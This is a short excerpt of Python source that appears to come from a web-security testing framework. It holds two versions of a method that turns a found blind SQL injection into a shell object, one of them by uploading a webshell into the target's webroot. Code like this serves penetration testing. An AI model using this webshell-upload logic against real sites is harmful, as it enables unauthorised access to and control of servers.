def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _generateShell(self, vuln_obj):
"""
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sqlmap shell object if sqlmap could fingerprint the database.
"""
bsql = blind_sqli_response_diff()
bsql.setEqualLimit(self._equalLimit)
bsql.setEquAlgorithm(self._equAlgorithm)
dbBuilder = dbDriverBuilder(self._urlOpener, bsql.equal)
driver = dbBuilder.getDriverForVuln(vuln_obj)
if driver is None:
return None
else:
# Create the shell object
shell_obj = sqlShellObj(vuln_obj)
shell_obj.setGoodSamaritan(self._goodSamaritan)
shell_obj.setDriver(driver)
kb.kb.append(self, "shells", shell_obj)
return shell_obj
